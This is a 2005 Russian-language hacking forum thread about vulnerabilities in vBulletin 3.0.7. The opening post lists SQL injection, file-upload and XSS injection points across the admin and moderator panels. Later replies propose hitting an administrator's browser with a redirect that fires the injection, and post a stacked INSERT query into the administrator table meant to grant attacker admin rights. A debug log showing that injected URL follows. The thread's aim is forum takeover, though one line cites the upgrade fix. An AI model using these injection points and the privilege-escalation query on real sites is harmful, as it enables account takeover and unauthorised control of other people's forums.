Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
vBulletin SQL INJ <=3.0.7 |

27.09.2005, 23:01
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме: 208487
Репутация:
11
|
|
vBulletin SQL INJ <=3.0.7
Код:
Продукт: vBulletin
URL: http://vbulletin.com
Версия: <= vBulletin 3.0.7
Уязвимость: SQL-инъекция и загрузка произвольных файлов
SQL-Injection:
/joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
/modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
/modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>
/modcp/user.php:
GET: <do=avatar&userid=0XF>
/admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>
/admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
/admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>
/admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
/admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
/admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>
/admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
/admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
/admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>
/admincp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
/admincp/usertools.php:
POST: <do=updateprofilepic>
/admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>
Загрузка произвольных файлов:
/admincp/image.php:
POST: <do=upload&table=avatar>
POST: <do=upload&table=icon>
POST: <do=upload&table=smilie>
XSS:
/modcp/index.php:
GET: <do=frames&loc=[XSS]>
/modcp/user.php:
GET: <do=gethost&ip=[XSS]>
/admincp/css.php:
GET: <do=doedit&dostyleid=1&group=[XSS]>
/admincp/index.php:
GET: <redirect=[XSS]>
GET: <do=frames&loc=[XSS]>
/admincp/user.php:
GET: <do=emailpassword&email=[XSS]>
/admincp/usertitle.php:
GET: <do=gethost&ip=[XSS]>
/admincp/language.php:
GET: <do=rebuild&goto=[XSS]>
/admincp/modlog.php:
GET: <do=view&orderby=[XSS]>
/admincp/template.php:
GET: <do=colorconverter&hex=[XSS]>
GET: <do=colorconverter&rgb=[XSS]>
GET: <do=modify&expandset=[XSS]>
Решение: обновить до версии vBulletin 3.0.9
Источник http://www.securityinfo.ru/2005/09/s...vbulletin.html
|
|
|

29.09.2005, 15:47
|
|
Познающий
Регистрация: 21.07.2005
Сообщений: 52
Провел на форуме: 213512
Репутация:
8
|
|
какой смысл всех этих уязвимостей, если их юзанье доступно только модераторам (с доступом в modcp) и админам...
kolorom,
/admincp/image.php - тебе не кажется, что сюда имеет доступ только админ?
|
|
|

29.09.2005, 17:06
|
|
Участник форума
Регистрация: 07.03.2005
Сообщений: 160
Провел на форуме: 418635
Репутация:
30
|
|
|
|
|

30.09.2005, 12:51
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
ёпт если переносите тему то предупреждайте а то инфа может выйти за пределы=)))
Визарт внимательным надо быть!
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

30.09.2005, 14:52
|
|
Постоянный
Регистрация: 18.06.2005
Сообщений: 872
Провел на форуме: 3007945
Репутация:
765
|
|
2 m0nzt3r... Секреты есть секреты... лол..
|
|
|

01.10.2005, 18:38
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме: 208487
Репутация:
11
|
|
Я то тут причем...я выложил ее перенесли а дальше это уже по вашей косоглазости...
|
|
|

20.12.2005, 14:38
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме: 632524
Репутация:
9
|
|
ПОЧЕМУЖЕ не актуальна?!!! Ёмаё! Проявите воображение! Хакеры...
Предпаложим есть SQL inj (GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>)... БЕРЕм левый сайт ставим на нем редирект на Эту sql'ку. И вся фишка заключается не выводе на экран всех паролей (Как все привыкли), а например которая вставляет нового админа или меняет его пасс.! ))))))))))
|
|
|

24.12.2005, 02:33
|
|
Новичок
Регистрация: 04.11.2005
Сообщений: 12
Провел на форуме: 18677
Репутация:
0
|
|
POMOGITE CIUT DODELOT
vot tak ideja v top cto vi regites na forume cto lomajite,
potom delajete etu sql injekciju
INSERT INTO " . TABLE_PREFIX . "administrator (userid, adminpermissions) VALUES (vash_ID, PRAVA)
Po ideje vi polucite prava admina 
vot kto mozet skazite kakoj TABLE_PREFIX v vB, ato stavit len i kakije prava u korenogo admina obichno tot cto na pervoj stroke v baze dannih
vsio eto obosnovano na 3.5.2 mozet v 3.0.8 podrugomu uvi drugoj versiji ne nashol esli you kogo est vilzite php fail /upload/install/install.php 
|
|
|

24.12.2005, 06:50
|
|
Новичок
Регистрация: 13.03.2005
Сообщений: 29
Провел на форуме: 111754
Репутация:
0
|
|
А Я знаю зачем xss в админке, вот напримеро пасти других админов, такая типа защита от дурака на форуме на тему садо маза.
|
|
|

24.12.2005, 18:08
|
|
Новичок
Регистрация: 04.11.2005
Сообщений: 12
Провел на форуме: 18677
Репутация:
0
|
|
nda toka admin ili mod kazis mogut zalid sql inj
esli komu interesno vot error
Database error in vBulletin 3.0.7:
Invalid SQL:
SELECT * FROM vb3_calendarcustomfield
WHERE calendarcustomfieldid = 58; INSERT INTO vb3_administrator (userid, adminpermissions) VALUES (2, 65532);
mysql error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO vb3_administrator (userid, adminpermissions) VALU
mysql error number: 1064
Date: Saturday 24th of December 2005 02:04:14 PM
Script: http://localhost/upload/admincp/admincalendar.php?do=addcustom&calendarcustomfield id=58;%20INSERT%20INTO%20vb3_administrator%20(user id,%20adminpermissions)%20VALUES%20(2,%2065532);
Referer: http://localhost/wtf.htm
Username: Admin
IP Address: 127.0.0.1
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|